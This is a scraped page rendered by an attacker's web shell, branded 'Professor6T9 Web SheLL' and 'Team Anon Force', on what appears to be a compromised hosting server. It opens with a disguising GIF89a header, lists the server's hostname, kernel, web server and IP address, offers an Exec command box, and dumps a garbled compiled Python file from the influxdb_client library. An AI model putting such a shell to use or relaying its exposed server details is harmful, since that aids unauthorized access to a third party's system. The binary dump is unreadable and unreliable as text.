GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux das102.truehost.cloud 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
LiteSpeed
156.232.88.2
/
opt
/
alt
/
python38
/
lib
/
python3.8
/
site-packages
/
influxdb_client
/
domain
/
__pycache__
[ HOME ]
Exec
Submit
File Name : delete_predicate_request.cpython-38.pyc
U ܒi5 � @ s( d Z ddlZddlZG dd� de�ZdS )a InfluxDB OSS API Service. The InfluxDB v2 API provides a programmatic interface for all interactions with InfluxDB. Access the InfluxDB API using the `/api/v2/` endpoint. # noqa: E501 OpenAPI spec version: 2.0.0 Generated by: https://openapi-generator.tech � Nc @ s� e Zd ZdZdddd�Zdddd�Zdd d �Zedd� �Zej d d� �Zedd� �Z e j dd� �Z edd� �Zej dd� �Zdd� Zdd� Z dd� Zdd� Zdd� ZdS )�DeletePredicateRequestz�NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. �datetime�str)�start�stop� predicater r r Nc C s6 d| _ d| _d| _d| _|| _|| _|dk r2|| _dS )z4DeletePredicateRequest - a model defined in OpenAPI.N)�_start�_stop� _predicateZ discriminatorr r r )�selfr r r � r �`/opt/alt/python38/lib/python3.8/site-packages/influxdb_client/domain/delete_predicate_request.py�__init__, s zDeletePredicateRequest.__init__c C s | j S )a3 Get the start of this DeletePredicateRequest. A timestamp ([RFC3339 date/time format](https://docs.influxdata.com/influxdb/latest/reference/glossary/#rfc3339-timestamp)). The earliest time to delete from. :return: The start of this DeletePredicateRequest. :rtype: datetime )r �r r r r r 8 s zDeletePredicateRequest.startc C s |dkrt d��|| _dS )a7 Set the start of this DeletePredicateRequest. A timestamp ([RFC3339 date/time format](https://docs.influxdata.com/influxdb/latest/reference/glossary/#rfc3339-timestamp)). The earliest time to delete from. :param start: The start of this DeletePredicateRequest. :type: datetime Nz-Invalid value for `start`, must not be `None`)� ValueErrorr )r r r r r r C s c C s | j S )a/ Get the stop of this DeletePredicateRequest. A timestamp ([RFC3339 date/time format](https://docs.influxdata.com/influxdb/latest/reference/glossary/#rfc3339-timestamp)). The latest time to delete from. :return: The stop of this DeletePredicateRequest. :rtype: datetime )r r r r r r P s zDeletePredicateRequest.stopc C s |dkrt d��|| _dS )a2 Set the stop of this DeletePredicateRequest. A timestamp ([RFC3339 date/time format](https://docs.influxdata.com/influxdb/latest/reference/glossary/#rfc3339-timestamp)). The latest time to delete from. :param stop: The stop of this DeletePredicateRequest. :type: datetime Nz,Invalid value for `stop`, must not be `None`)r r )r r r r r r [ s c C s | j S )a Get the predicate of this DeletePredicateRequest. An expression in [delete predicate syntax](https://docs.influxdata.com/influxdb/latest/reference/syntax/delete-predicate/). :return: The predicate of this DeletePredicateRequest. :rtype: str �r r r r r r h s z DeletePredicateRequest.predicatec C s || _ dS )a Set the predicate of this DeletePredicateRequest. An expression in [delete predicate syntax](https://docs.influxdata.com/influxdb/latest/reference/syntax/delete-predicate/). :param predicate: The predicate of this DeletePredicateRequest. :type: str Nr )r r r r r r s s c C s� i }| j �� D ]z\}}t| |�}t|t�rBttdd� |��||<